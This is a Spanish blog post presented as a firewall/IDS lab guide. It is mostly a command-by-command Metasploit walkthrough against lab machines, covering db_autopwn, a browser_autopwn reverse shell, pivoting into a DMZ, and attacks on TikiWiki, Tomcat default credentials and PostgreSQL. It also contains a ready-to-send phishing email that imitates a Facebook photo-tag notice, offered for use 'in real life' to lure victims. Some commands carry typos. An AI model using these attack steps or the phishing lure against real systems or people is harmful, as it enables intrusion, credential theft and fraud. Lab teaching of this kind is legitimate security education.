miércoles, 19 de enero de 2011

Guía de laboratorio firewall e ids

“Una vulnerabilidad es tan limitada como tú quieras que sea”

En su computador encontrara 3 maquinas virtuales llamadas {1,2,3},corralas
1: backtrack(BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general)
2: Ubuntu server
3: Windows xp(Windows xp sp2)

Para backtrack dar start backtrak stream buffer (primera opción)
Ifconfig eth1 192.168.0.11 netmask 255.255.255.0
Luego escribir startx

Ubuntu server:
Escribir login :
User: msfadmin
Password: msfadmin
Escribir startx

Windows xp
No toca hacer nada






Primer ataque(firewall desactivado)

Para nuestro primer ataque vamos a utilizar el agente malicioso backtrack y Windows xp
Primero vamos a comprobar la eficiencia de nuestro firewall instalado por defecto
En backtrack abrimos una konsole y escribimos ping 192.168.0.120 y veremos que no nos permite hacer un ping
Luego nmap 192.168.0.120 para observar si podemos ver los puertos, pero efectivamente están todos filtrados.
Ir a backtrack->penetration->All ->Msfconsole

Ahí escribir db_driver sqlite3
db_create redes
db_connect redes
Eso lo hacemos para crear una base de datos y allí guardar todas las vulnerabilidades encontradas método llamado ( Vulnerability Assessment: análisis de puntos débiles o vulnerabilidades De carácter técnico realizado a un sistema, guardando estos puntos débiles en una base de datos).


Como este primer ataque se divide en dos , procedemos a desactivar el firewall de Windows xp
Inicio->panel de control->centro de seguridad->firewall de Windows->marcar la opción desactivado (no se recomienda)

Ahora en backtrack , ya tenemos lista nuestra base de datos (bolsa) y lo que haremos será hacer un análisis de footprinting para saber a qué tipo de sistema nos enfrentamos


Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos.





Escribir en una msfconsole
db_namp –PN –A 192.168.0.120
-PN : intenta identificar los servicios por los puertos abiertos en el sistema esto permite evaluar cada servicio de forma individual para intentar ubicar vulnerabilidades en los mismos.
-A: análisis completo para la identificación del sistema operativo

Luego escribir
Db_autopwn : script que permite realizar ataques múltiples basándose desde una base de datos

db_autopwn -t -p –e

Ahora revisamos las sesiones que se han creado

El meterpreter o meta intérprete es una familia de plugins avanzados para utilizar sobre sistemas Windows comprometidos que tienen como característica fundamental que todo es cargado en la memoria del sistema sin crear ningún proceso adicional.




Sessions –l

Para elegir la sesión hacemos sessions –i 1 o 2

Creamos la Shell reverse

Shell

Si no podemos crearla damos escribimos exit y re elegimos la sesión



Primer ataque (firewall activado)

Lo que haremos en este tipo de ataque es hacer que la victima caiga en una trampa y por medio de esta crear una Shell reversa.
Ir a backtrack->penetration->All ->Msfconsole

Alli escribir : nmap 192.168.0.120

Como podemos ver no se ha podido establecer ping con la víctima , cualquier persona creería que esto es seguro , pero ya veremos que no lo es .



Ahora escribir :
Use server/browser_autopwn
Este es un exploit que nos permite crear un servidor cargado de script envenenado con esto crearemos la conexión remota.

Show options


Set LHOST 192.168.0.11 // esto quiere decir donde quedara alojado nuestro server

Set SRVHOST 192.168.0.11// con esto le decimos que haga la conexión a el mismo para que en vez de lanzar un ataque a un servidor se vuelva promiscuo y espere peticiones


Set SRVPORT 80 // indicamos el puerto de salida de nuestro servidor

Ahora escribir: run


Acá veremos que se acaba de crear nuestro servidor.


El siguiente paso es hacer que nuestra victima caiga ingresando a la pagina pishing .

Como?
En la vida real se podría hacer mediante un mensaje de notificación de facebook ,
Es tan sencillo como crear un mensaje nuevo desde nuestra cuenta de Hotmail.com allí darle en editar texto modo html

Y escribir los datos que faltan en las xxx y luego enviarlo 










AMIGO_QUE_ENVIA_MENSAJE ha etiquetado una foto tuya en tu álbum.

Para ver las fotos, sigue el siguiente enlace:


http://www.facebook.com/n/?photo.php&pid=439128&op=1&view=all&subj=1101827805&id=1405875231&mid=a0d79cG41ac8eddG8ac16dG5

Gracias,
El equipo de Facebook

___
Este mensaje estaba destinado a PNOMBRE DE LA VICTIMA . Deseas controlar los mensajes de correo electrónicos que recibes de Facebook? Visita:
http://www.facebook.com/editaccount.php?notifications&md=cGhvdG9fdGFnO2Zyb209MTQwNTg3NTIzMTt1aWQ9MTQwNTg3NTIzMTtwaWQ9NDM5MTI4O3RvPTExMDE4Mjc4MDU=&mid=a0d79cG41ac8eddG8ac16dG5
Las oficinas de Facebook estan en 1601 S. California Ave., Palo Alto, CA94304.
En Windows xp abrimos el navegador y escribimos:
192.168.0.11/código
El código es el que sale de donde dice Using URL: 192.168.0.11/código

Escribimos sessions –l
Luego sessions –i número de la sesión
Podemos crear una Shell escribiendo “Shell”














COMPROMETIENDO UNA ARQUITECTURA DMZ

En la misma msfconsole escribir:
route
run get_local_subnets

run arp_scanner –r 192.168.0.1/24 // para saber que nodos están activos

Ahora pulsamos control+z para dejar nuestra sesión en background
Escribimos Y
Back
Route
route print
route add 192.168.0.22 255.255.255.0 1// añadimos nuestra nueva víctima que está dentro de la red comprometida
route print // verificamos que se haya creado la sesión
sessions –l
back // volvemos atrás para lanzar otro exploit

use auxiliary/scanner/portscan/tcp //exploit

lo que haremos será evaluar cuales puertos se encuentran abiertos

set PORTS 1-1000
set RHOSTS 192.168.0.22
run


connect -c 1 192.168.111.2 23// nos conectamos al puerto 23 por medio de la primera víctima que hace de puente


Atacando una base de datos dentro de la DMZ
Tiki CMS/Groupware o TikiWiki es un sistema de gestión de contenidos de índole colaborativa (CMS/Groupware) fácil de configurar y personalizar, diseñado para crear portales, sitios comunitarios, intranets y aplicaciones web en general.

Como ya sabemos que puertos tiene hacemos un
db_driver sqlite3
db_create a
db_connect a
db_nmap –NP –A 192.168.0.22

luego hacemos un db_services
y listo ahora damos

en esta sección atacaremos todas las vulnerabilidades encontradas y realizaremos el ataque vía tunneling 192.168.0.120


back
use auxiliary/admin/tikiwiki/tikidblib // atacaremos la base de datos que está en 192.168.0.22 que posee myql

set RHOST 192.168.229.129

exploit
ahora ya tenemos los datos de la base de datos

Abrimos otra konsole y escribimos mysql –u root –h 192.168.0.22 –proot

Atacando el servidor tomcat
Tomcat (también llamado Jakarta Tomcat o Apache Tomcat) funciona como un contenedor de servlets desarrollado bajo el proyecto Jakarta en la Apache Software Foundation. Tomcat implementa las especificaciones de los servlets y de JavaServer Pages (JSP) de Sun Microsystems.






En la msfconsole

use auxiliary/scanner/http/tomcat_mrg_login

set RHOSTS 192.168.0.22
set RPORT 8180
run


Cuando aparezca en verde es que encontró el login [+]
.. Aprovechando el user y el pass conseguimos otro exploit
En la msfconsole escribir

Back

use exploits/multi/http/tomcat_mgr_deploy
set USERNAME tomcat
set PASSWORD tomcat
set RPORT 8180
set RHOST 192.168.0.22
control +z
sessions –l




Ataque PostgreSQL
En la misma msfconsole
Back
use auxiliary/scanner/ postgres/postgres_login
set RHOST 192.168.0.22
nos logramos loguear con
usuario y password: postgres.

Ahora que ya tenemos los datos nos interesa el el fichero de configuración de usuarios para después realizar un brute forcé hacia el ssh

Back
use auxiliary/admin/ postgres/postgres_readfile
set PASSWORD postgres
set RHOST 192.168.0.22
Por último hacemos un db_autopwn –t –e –p

0 comentarios:

Publicar un comentario

Tu comentario será moderado la primera vez que lo hagas al igual que si incluyes enlaces. A partir de ahi no ser necesario si usas los mismos datos y mantienes la cordura. No se publicarán insultos, difamaciones o faltas de respeto hacia los lectores y comentaristas de este blog.